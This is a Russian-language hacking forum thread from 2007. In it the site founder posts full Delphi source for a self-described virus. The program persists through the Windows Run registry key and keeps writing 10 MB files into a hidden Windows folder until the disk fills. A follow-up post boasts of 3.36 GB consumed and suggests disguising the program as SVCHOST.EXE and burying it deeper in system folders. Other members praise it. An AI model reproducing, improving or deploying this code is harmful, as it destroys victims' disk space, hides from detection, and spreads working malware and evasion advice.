Мы переехали http://www.webxakep.net

Пятница, 03.01.2025
На главную · Регистрация · Войти · Пользователи · User`Bars · Обратная связь · WebTools · Последние сообщения · Поиск

  • Страница 1 из 1
  • 1
Модератор форума: 3xstie  
Вирусняк связанный с локал дисками

ArxWolfДата: Понедельник, 09.04.2007, 07:46 | Сообщение # 1
Administration Men
Группа: Основатель
Сообщений:184
Статус: Offline
program Project2;

Uses Windows,Registry,Classes,sysutils;

Var
MSG : TMSG;
RegEnd : Boolean;
Size : Integer;

Const
// Место где будут создаваться файлы
// ставим самую занюханую папку
// естествино надо вычеслять директорию Windows
DirTarget = 'C:\WINDOWS\Help\Tours\';
// Начало имени файла
ReName = 'SysPack';
// Конечное расширение файла
FilExt = '.sys';
// Имя файла который будет в реестре
ExeName = 'system.exe';
// Размер создаваемого файла
UpSize = 10000000;
// Интервал промежудка создание файла чем больше
// тем меньше нагрузка на процессор и меньше внимание ...
TimeXre = 30;

// Получаем уникальное имя, которое не когда в жизни не повториться !!!!
Function GetFHName : String;
Var
S : String;
I : Integer;
Begin
S := DateTimeToStr(Time);
For I := 1 To Length(S) Do
If S[I] = ':' Then
S[I] := '_';
Result := S;
End;

// Создаём файл
Procedure FuckDrive;
Var
St : TMemoryStream;
Begin
St := TMemoryStream.Create;
Try
St.Size := UpSize;
St.SaveToFile(DirTarget+ReName+GetFHName+'FilExt');
Finally
St.Free;
End;
End;

// Путь к нашей проге
Function FileName : String;
Var
Buffer : Array[0..256] of Char;
Begin
GetModuleFileName(0,Buffer,SizeOf(Buffer));
Result := Buffer;
End;

// Регистрируем в реестрне
Procedure RegistrySF;
Var
Reg : TRegistry;
Begin
Reg := TRegistry.Create;
Try
Reg.RootKey := HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',True);
Reg.WriteString(ExeName,FileName);
Reg.CloseKey;
Finally
Reg.Free;
End;
RegEnd := True;
End;

// Активация
Procedure Activated;
Begin
If Not RegEnd Then
RegistrySF;
FuckDrive;
End;

Begin
While GetMessage(MSG,GetModuleHandle(Nil),0,0) Do
Begin
Sleep(TimeXre);
Activated;
End;
End.




 


ArxWolfДата: Понедельник, 09.04.2007, 07:52 | Сообщение # 2
Administration Men
Группа: Основатель
Сообщений:184
Статус: Offline
При написании подсказок (пример выше) вирусняк скушал -
360 файлов, общий вес - 3,36 ГБ (3 610 000 000 байт)
biggrin
В этом вирусе есть много плюсов :
1 ) вес 90 кб
2) малый шаблон
3) из-за того, что файлов много и по 10 метров более менее, меньше нагрузка на процессор (у меня было макс 9%)
4) Да и прикольное, потихонь кушает и кушает biggrin

Что можно добавить:
1) надо чтоб папку Windows он вычислял я не стал это писать
2) папка должна быть самая занюханная, где-то в недрах Windows
3) переименовать примерно в SVCHOST.EXE
ну и т.д.




 


segaДата: Понедельник, 09.04.2007, 10:16 | Сообщение # 3
Рядовой
Группа: Новенькие
Сообщений:1
Статус: Offline
biggrin cool dry wacko wink smile happy tongue
 


4RXRU5HДата: Четверг, 12.04.2007, 18:01 | Сообщение # 4
0xFFFFFFF
Группа: Основатель
Сообщений:271
Статус: Offline
Да отличная Зверушка. biggrin

 

  • Страница 1 из 1
  • 1
Поиск:
..:WX Group:..
WebXakep 2007 - 2008 year.
Desing by arXRush & ArxWolf :)
Все прова принадлежат ArxWolf © Webxakep.net, все представленные материалы на портале в целях ознакомления.[Хакерство и Безопасность]
Форум посвящённый сетевой безопасности, хакерству, исследованию, проникновению. Есть темы такие как : Основы новичкам, BUGTRAQ, ICQ, Email, IRC, Skype, MSN, Крякерам, Фрикерам, Мобильные устройства, Вирусология, Кодинг, ОС, Soft, Халява, ЖелезО, Купля, Продажа, Обмен, Трёпка, Книги, Статьи, Новости, Группировки, Взлом.

Rambler's Top100